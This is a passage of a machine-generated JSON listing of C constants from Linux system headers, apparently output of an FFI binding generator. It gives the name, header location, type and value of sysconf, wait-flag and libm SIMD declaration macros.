"_SC_SEM_NSEMS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:139:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "_SC_SEM_VALUE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:141:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 33 }, { "tag": "const", "name": "HUGE_VALL", "ns": 0, "location": "/usr/include/math.h:60:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "INFINITY", "ns": 0, "location": "/usr/include/math.h:91:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_SIGQUEUE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:143:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 34 }, { "tag": "const", "name": "_SC_PII", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:186:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 53 }, { "tag": "const", "name": "_SC_2_LOCALEDEF", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:183:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 52 }, { "tag": "const", "name": "_SC_PII_XTI", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:188:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 54 }, { "tag": "const", "name": "_SC_PII_SOCKET", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:190:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 55 }, { "tag": "const", "name": "_SC_PII_INTERNET", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:192:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 56 }, { "tag": "const", "name": "_SC_PII_OSI", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:194:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 57 }, { "tag": "const", "name": "_SC_POLL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:196:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 58 }, { "tag": "const", "name": "_SC_SELECT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:198:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 59 }, { "tag": "const", "name": "_SC_IOV_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:202:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 60 }, { "tag": "const", "name": "_SC_UIO_MAXIOV", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:200:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 60 }, { "tag": "const", "name": "_SC_RE_DUP_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:166:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 44 }, { "tag": "const", "name": "_SC_LINE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:164:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 43 }, { "tag": "const", "name": "_SC_CHARCLASS_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:168:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 45 }, { "tag": "const", "name": "_SC_2_VERSION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:171:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 46 }, { "tag": "const", "name": "_SC_2_C_DEV", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:175:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 48 }, { "tag": "const", "name": "_SC_2_C_BIND", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:173:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 47 }, { "tag": "const", "name": "__VAESINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vaesintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_2_FORT_DEV", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:177:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 49 }, { "tag": "const", "name": "__DEFAULT_FN_ATTRS_F", "ns": 0, "location": "/tmp/tmpCFVK1AC1.tmp:1561:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_2_FORT_RUN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:179:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 50 }, { "tag": "const", "name": "_SC_2_SW_DEV", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:181:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 51 }, { "tag": "const", "name": "__DECL_SIMD_expf16", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:83:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__DECL_SIMD_expl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:82:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_DEVICE_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:373:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 140 }, { "tag": "const", "name": "__DECL_SIMD_expf64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:85:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__DECL_SIMD_expf32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:84:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__ENUM_IDTYPE_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:44:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_FIFO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:381:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 144 }, { "tag": "const", "name": "_SC_CLOCK_SELECTION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:367:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 137 }, { "tag": "const", "name": "__DECL_SIMD_logf128x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:78:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__DECL_SIMD_logf64x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:77:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__DECL_SIMD_expf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:81:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__DECL_SIMD_exp", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:80:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_DEVICE_SPECIFIC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:375:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 141 }, { "tag": "const", "name": "WEXITED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:31:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "__DECL_SIMD_logf64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:74:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_XOPEN_REALTIME_THREADS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:354:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 131 }, { "tag": "const", "name": "WSTOPPED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:30:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "__DECL_SIMD_logf32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:73:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_CPUTIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:369:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 138 }, { "tag": "const", "name": "_SC_FD_MGMT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:379:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 143 }, { "tag": "const", "name": "WUNTRACED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:26:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "__DECL_SIMD_logf32x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:76:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "WNOHANG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:25:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__DECL_SIMD_logf128", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:75:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_XOPEN_LEGACY", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:350:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 129 }, { "tag": "const", "name": "__WCLONE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:39:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2147483648 }, { "tag": "const", "name": "__DECL_SIMD_logf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:70:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_C_LANG_SUPPORT_R", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:365:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 136 }, { "tag": "const", "name": "__WALL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1073741824 }, { "tag": "const", "name": "__DECL_SIMD_log", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:69:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_C_LANG_SUPPORT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:363:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 135 }, { "tag": "const", "name": "__WNOTHREAD", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:36:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 536870912 }, { "tag": "const", "name": "__DECL_SIMD_logf16", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:72:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "WCONTINUED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:32:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "_SC_ADVISORY_INFO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:357:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 132 }, { "tag": "const", "name": "__DECL_SIMD_logl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:71:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "WNOWAIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitflags.h:33:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16777216 }, { "tag": "const", "name": "__DECL_SIMD_powf128x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:100:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_SHELL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:407:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 157 }, { "tag": "const", "name": "__DECL_SIMD_powf64x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:99:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "HUGE_VALF", "ns": 0, "location": "/usr/include/math.h:59:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "HUGE_VAL", "ns": 0, "location": "/usr/include/math.h:48:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_BARRIERS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:359:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 133 }, { "tag": "const", "name": "_SC_BASE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:361:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 134 }, { "tag": "const", "name": "__DECL_SIMD_powf64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:96:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_BITS_FLOATN_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/floatn.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_REGEX_VERSION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:405:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 156 }, { "tag": "const", "name": "_SC_THREAD_CPUTIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:371:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 139 }, { "tag": "const", "name": "__DECL_SIMD_powf32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:95:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_XOPEN_REALTIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:352:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 130 }, { "tag": "const", "name": "_SC_SPORADIC_SERVER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:413:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 160 }, { "tag": "const", "name": "__DECL_SIMD_powf32x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:98:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_THREAD_SPORADIC_SERVER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:415:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 161 }, { "tag": "const", "name": "_SC_DEVICE_SPECIFIC_R", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:377:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 142 }, { "tag": "const", "name": "__DECL_SIMD_powf128", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:97:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__W_CONTINUED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitstatus.h:58:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 65535 }, { "tag": "const", "name": "__DECL_SIMD_powf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:92:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_SIGNALS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:409:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 158 }, { "tag": "const", "name": "_SC_FILE_SYSTEM", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:389:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 148 }, { "tag": "const", "name": "__DECL_SIMD_pow", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:91:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_SPIN_LOCKS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:401:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 154 }, { "tag": "const", "name": "_SC_FILE_LOCKING", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:387:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 147 }, { "tag": "const", "name": "_SC_FILE_ATTRIBUTES", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:385:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 146 }, { "tag": "const", "name": "__DECL_SIMD_powf16", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:94:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_REGEXP", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:403:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 155 }, { "tag": "const", "name": "_SC_PIPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:383:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 145 }, { "tag": "const", "name": "__DECL_SIMD_powl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:93:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_READER_WRITER_LOCKS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:399:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 153 }, { "tag": "const", "name": "__DECL_SIMD_expf32x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:87:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_NETWORKING", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:397:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 152 }, { "tag": "const", "name": "_SC_SINGLE_PROCESS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:395:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 151 }, { "tag": "const", "name": "__DECL_SIMD_expf128", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:86:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_MULTI_PROCESS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:393:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 150 }, { "tag": "const", "name": "__DECL_SIMD_expf128x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:89:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__WCOREFLAG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/waitstatus.h:59:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "_SC_MONOTONIC_CLOCK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:391:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 149 }, { "tag": "const", "name": "__DECL_SIMD_expf64x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:88:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_INT_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:297:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 104 }, { "tag": "const", "name": "__DECL_SIMD_sin", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:47:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_INT_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:299:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 105 }, { "tag": "const", "name": "__DECL_SIMD_sinf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:48:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__DECL_SIMD_sinl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:49:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_CHAR_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:293:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 102 }, { "tag": "const", "name": "__DECL_SIMD_sinf16", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:50:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_SPAWN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:411:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 159 }, { "tag": "const", "name": "_SC_NZERO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:307:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 109 }, { "tag": "const", "name": "_SC_CHAR_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:295:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 103 }, { "tag": "const", "name": "_SC_SSIZE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:309:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 110 }, { "tag": "const", "name": "_SC_LONG_BIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:301:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 106 }, { "tag": "const", "name": "__DECL_SIMD_cosf64x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_WORD_BIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:303:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 107 }, { "tag": "const", "name": "__DECL_SIMD_cosf128x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:45:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_MB_LEN_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:305:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 108 }, { "tag": "const", "name": "_SC_2_CHAR_TERM", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:277:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 95 }, { "tag": "const", "name": "_SC_2_C_VERSION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:279:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 96 }, { "tag": "const", "name": "_SC_XOPEN_ENH_I18N", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:272:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 93 }, { "tag": "const", "name": "_SC_XOPEN_SHM", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:274:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 94 }, { "tag": "const", "name": "_SC_XOPEN_XPG3", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:286:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 99 }, { "tag": "const", "name": "_SC_XOPEN_XPG4", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:288:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 100 }, { "tag": "const", "name": "_SC_2_UPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:281:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 97 }, { "tag": "const", "name": "_SC_XOPEN_XPG2", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:284:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 98 }, { "tag": "const", "name": "__DECL_SIMD_sincosf128", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:64:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_NL_NMAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:334:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 122 }, { "tag": "const", "name": "_SC_NL_TEXTMAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:338:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 124 }, { "tag": "const", "name": "__DECL_SIMD_sincosf32x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:65:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_NL_SETMAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:336:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 123 }, { "tag": "const", "name": "__DECL_SIMD_sincosf64x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:66:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_NL_LANGMAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:330:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 120 }, { "tag": "const", "name": "_SC_CHAR_BIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:291:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 101 }, { "tag": "const", "name": "__DECL_SIMD_sincosf128x", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:67:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_NL_MSGMAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:332:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 121 }, { "tag": "const", "name": "__DECL_SIMD_sincosl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libm-simd-decl-stubs.h:60:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": 